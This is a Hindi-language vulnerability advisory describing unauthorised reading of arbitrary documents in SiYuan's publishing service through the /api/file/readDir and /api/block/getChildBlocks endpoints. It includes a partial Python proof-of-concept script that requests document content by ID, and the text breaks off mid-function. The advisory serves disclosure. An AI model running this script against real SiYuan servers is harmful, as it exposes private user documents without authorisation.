SiYuan में प्रकाशन सेवा के भीतर मनमाना दस्तावेज़ पठन है

### विवरण दस्तावेज़ आईडी /api/file/readDir इंटरफ़ेस के माध्यम से प्राप्त किए गए थे, और फिर /api/block/getChildBlocks इंटरफ़ेस का उपयोग सभी दस्तावेज़ों की सामग्री देखने के लिए किया गया था। ### PoC ```python #!/usr/bin/env python3 """SiYuan /api/block/getChildBlocks दस्तावेज़ सामग्री पठन""" import requests import json import sys def get_child_blocks(target_url, doc_id): """ SiYuan के /api/block/getChildBlocks API को दस्तावेज़ सामग्री प्राप्त करने के लिए कॉल करें """ url = f"{target_url.rstrip('/')}/api/block/getChildBlocks" headers = { "Content-Type": "application/json" } data = { "id": doc_id } try: response = requests.post(url, json=data, headers=headers, timeout=10) response.raise_for_status() result = response.json() if result.get("code") != 0: print(f"[-] अनुरोध विफल: {result.get('msg', 'अज्ञात त्रुटि')}") return None return result.get("data") except requests.exceptions.RequestException as e: print(f"[-] नेटवर्क अनुरोध विफल: {e}") return None except json.JSONDecodeError as e: print(f"[-] JSON पार्सिंग विफल: {e}") return None def format_block_content(block): """ब्लॉक सामग्री को प्रारूपित करें"""